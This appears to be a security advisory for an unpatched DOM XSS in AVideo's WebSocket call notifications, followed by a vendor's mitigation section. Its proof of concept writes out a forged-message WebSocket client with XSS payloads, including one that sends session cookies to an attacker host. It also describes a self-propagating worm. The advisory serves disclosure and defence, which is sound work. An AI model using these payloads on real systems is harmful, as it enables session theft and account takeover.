GHSA-w4hp-w536-jg64
MEDIUMAVideo: DOM XSS via Unsanitized Display Name in WebSocket Call Notification
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
wwbn/avideoReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The AVideo YPTSocket plugin's caller feature renders incoming call notifications using the jQuery Toast Plugin, passing the caller's display name directly as the heading parameter. The toast plugin constructs the heading as raw HTML ('<h2>' + heading + '</h2>') and inserts it into the DOM via jQuery's .html() method, which parses and executes any embedded HTML or script content. An attacker can set their display name to an XSS payload and trigger code execution on any online user's browser simply by initiating a call - no victim interaction is required beyond being connected to the WebSocket.
Details
When a call notification arrives via WebSocket, the caller's identity is extracted from the JSON message:
// plugin/YPTSocket/caller.js:73
userIdentification = json.from_identification;
This value is passed directly to the jQuery Toast Plugin as the heading:
// plugin/YPTSocket/caller.js:89
heading: userIdentification,
Inside the jQuery Toast Plugin, the heading is rendered as raw HTML:
// node_modules/jquery-toast-plugin/src/jquery.toast.js:60
// Constructs: '<h2>' + heading + '</h2>'
// Then inserts via .html()
jQuery's .html() method parses the string as HTML and executes any script-bearing elements (such as <img onerror>, <svg onload>, etc.).
There is a secondary injection vector in the same file where the full JSON message is placed inside a single-quoted onclick attribute:
// plugin/YPTSocket/caller.js:121-123
imageAndButton += '<button class="btn btn-danger btn-circle incomeCallBtn" onclick=\'hangUpCall(' + JSON.stringify(json) + ')\'><i class="fas fa-phone-slash"></i></button>';
if (isJsonReceivingCall(json)) {
imageAndButton += '<button class="btn btn-success btn-circle incomeCallBtn" onclick=\'acceptCall(' + JSON.stringify(json) + ')\'><i class="fas fa-phone"></i></button>';
JSON.stringify(json) is placed inside a single-quoted onclick attribute. If any field in json contains a single quote, it breaks the attribute boundary and allows attribute injection.
Proof of Concept
Important note on the attack vector: User::setName() at objects/user.php:2069 uses strip_tags(), so the display name IS sanitized on the server side when set through the normal UI or API. However, the WebSocket server relays call messages as-is without server-side validation of the from_identification field. A malicious WebSocket client can send any from_identification value directly over the WebSocket protocol, bypassing the server-side sanitization entirely. The attack requires a custom WebSocket client, not the normal UI.
Step 1: Connect a malicious WebSocket client and send a forged call message
The following JavaScript connects directly to the AVideo WebSocket server and sends a call message with an XSS payload in the from_identification field:
// Malicious WebSocket client - bypasses server-side strip_tags() sanitization
const ws = new WebSocket('wss://your-avideo-instance.com:8888');
ws.onopen = function() {
// Send a forged call message with HTML in from_identification
const payload = {
msg: 'call',
from_users_id: 1,
to_users_id: VICTIM_USER_ID,
from_identification: '<img src=x onerror=alert(document.cookie)>',
resourceURL: 'https://your-avideo-instance.com/meet/123'
};
ws.send(JSON.stringify(payload));
console.log('Forged call message sent');
};
Step 2: When the victim receives the call notification, the toast renders from_identification as HTML via jQuery's .html(). The <img> tag triggers the onerror handler, executing JavaScript in the victim's browser context.
More advanced payload for credential exfiltration:
// Credential exfiltration via forged WebSocket call
const ws = new WebSocket('wss://your-avideo-instance.com:8888');
ws.onopen = function() {
ws.send(JSON.stringify({
msg: 'call',
from_users_id: 1,
to_users_id: VICTIM_USER_ID,
from_identification: '<img src=x onerror="fetch(\'https://attacker.example.com/log?\'+document.cookie)">',
resourceURL: 'https://your-avideo-instance.com/meet/123'
}));
};
Reproduction steps:
- Identify the WebSocket server address for the target AVideo instance (typically port 8888).
- Connect a custom WebSocket client to the server.
- Send a call message with
from_identificationset to<img src=x onerror=alert(document.cookie)>. - Ensure a victim user is online and connected to the WebSocket (any authenticated page with YPTSocket loaded).
- Observe the XSS payload executing in the victim's browser when the toast notification appears. No victim interaction is required.
Impact
This is a zero-click stored XSS vulnerability. The victim does not need to click anything - merely being connected to the WebSocket (which happens automatically on any authenticated page load) is sufficient for the attack to succeed. The attacker controls when the payload fires by initiating a call.
Consequences include:
- Session hijacking: Steal the victim's session cookie and impersonate them.
- Account takeover: If the victim is an administrator, the attacker gains full platform control.
- Worm propagation: The XSS payload can automatically change the victim's display name to the same payload and call other online users, creating a self-propagating worm.
- Keylogging and credential theft: Inject persistent scripts that capture keystrokes on the current page.
The attack is zero-click and can target any specific online user.
- CWE: CWE-79 (Cross-Site Scripting - DOM-based)
Recommended Fix
HTML-escape the heading value before passing it to $.toast() at plugin/YPTSocket/caller.js:89:
heading: $('<span>').text(userIdentification).html(),
This uses jQuery's .text() to safely encode the user-controlled string, then extracts the escaped HTML via .html().
Found by aisafe.io
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | wwbn/avideo | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for wwbn/avideo. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of wwbn/avideo has shipped for GHSA-w4hp-w536-jg64 yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-w4hp-w536-jg64 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-w4hp-w536-jg64. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-w4hp-w536-jg64 in your dependencies?
O3 detects GHSA-w4hp-w536-jg64 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.